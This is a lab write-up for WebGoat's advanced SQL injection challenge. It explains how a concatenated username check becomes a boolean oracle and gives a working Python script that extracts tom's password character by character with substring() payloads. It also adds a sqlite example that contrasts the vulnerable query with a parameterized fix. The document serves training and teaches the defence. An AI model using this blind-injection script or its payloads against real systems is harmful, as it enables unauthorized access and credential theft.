The problematic code:
username_reg is concatenated directly into checkUserQuery and that string is executed as the SQL query. If the query returns a row, the application reports that the user already exists; otherwise it declares the insert statement with a PreparedStatement and placeholders, sets the corresponding parameters with setString, and then executes it. The insert step is fine; the defect is the check, statement.executeQuery(checkUserQuery), which we use as a boolean oracle to brute-force tom's password from the two different responses.
When the injected condition is true, a row is found, so the response is “PAYLOAD already exists please try to register with a different username.” with "lessonCompleted" : false
When the injected condition is false, no row is found, and the response is “PAYLOAD ceated, please proceed to the login page.” with "lessonCompleted" : true
Using length(), the password length is brute-forced to 23
Using substring(), write a script to brute-force the password character by character
Script:
```python
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:jack
# datetime:2019-09-01 22:31
# software: PyCharm
import requests
import string


def getPassword():
    # Session cookie and lesson URL of the local WebGoat instance
    cookies = {'JSESSIONID': 'dZcRiB0wXwYNLWxpjqdGiIHl2jJojW2fj4-eJRxT'}
    url = "http://127.0.0.1:8080/WebGoat/SqlInjectionAdvanced/challenge"
    password = ''
    # Password length was found to be 23 with length(); test one position at a time
    for num in range(1, 24):
        for word in string.ascii_lowercase:
            # Injected into checkUserQuery: the condition is true only when the
            # character at position num equals word; "-- kljh" comments out the rest
            pa = "tom' and substring(password," + str(num) + ",1)='" + word + "' -- kljh"
            payload = {'username_reg': pa,
                       'email_reg': '123%40123.com',
                       'password_reg': '123',
                       'confirm_password_reg': '123'}
            r = requests.put(url, cookies=cookies, data=payload)
            # lessonCompleted == False means "already exists", i.e. the condition was true
            if r.json()['lessonCompleted'] is False:
                password += word
                print('password:' + password)
                break


if __name__ == "__main__":
    getPassword()
```
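As an added illustration that is not part of the original write-up or of WebGoat's code, the following Python stand-in reproduces the defect described above (the check query built by string concatenation) next to the parameterized form that the lesson's insert already uses, so both can be fed the same boolean condition and compared. The table and column names, tom's password and the use of sqlite3 are assumptions made for this example; sqlite spells substring() as substr().

```python
import sqlite3

# Constructed stand-in for the lesson's user table and tom's record.
# The password is a made-up 23-character value, not WebGoat's real one.
TOM_PASSWORD = "constructedpassword1234"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE challenge_users (userid TEXT, email TEXT, password TEXT)")
    conn.execute("INSERT INTO challenge_users VALUES (?, ?, ?)",
                 ("tom", "tom@example.com", TOM_PASSWORD))
    return conn


def user_exists_vulnerable(conn, username_reg):
    # Mirrors the lesson's defect: username_reg is concatenated straight into
    # checkUserQuery, so attacker-controlled text becomes part of the SQL grammar
    # and the "already exists" / "created" responses act as a boolean oracle.
    check_user_query = ("SELECT userid FROM challenge_users WHERE userid = '"
                        + username_reg + "'")
    return conn.execute(check_user_query).fetchone() is not None


def user_exists_fixed(conn, username_reg):
    # Hardened form: the same check done the way the lesson's insert already is,
    # with a bound parameter, so the whole string is compared as a single value.
    row = conn.execute("SELECT userid FROM challenge_users WHERE userid = ?",
                       (username_reg,)).fetchone()
    return row is not None


def probe_char(check, conn, position, char):
    # The write-up's substring condition; returns True when the given check
    # reports "already exists" for it. Only the vulnerable check ever does so.
    payload = "tom' and substr(password,%d,1)='%s' -- kljh" % (position, char)
    return check(conn, payload)


def probe_length(check, conn, n):
    # The write-up's length() condition, against either implementation.
    payload = "tom' and length(password)=%d -- kljh" % n
    return check(conn, payload)
```

With the concatenated query, probe_length(user_exists_vulnerable, conn, 23) and probe_char(user_exists_vulnerable, conn, 1, "c") both report a match while wrong guesses do not; with the bound parameter every probe returns False because the payload is just an unknown username.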
That concludes this article. Thank you for reading; your feedback is welcome.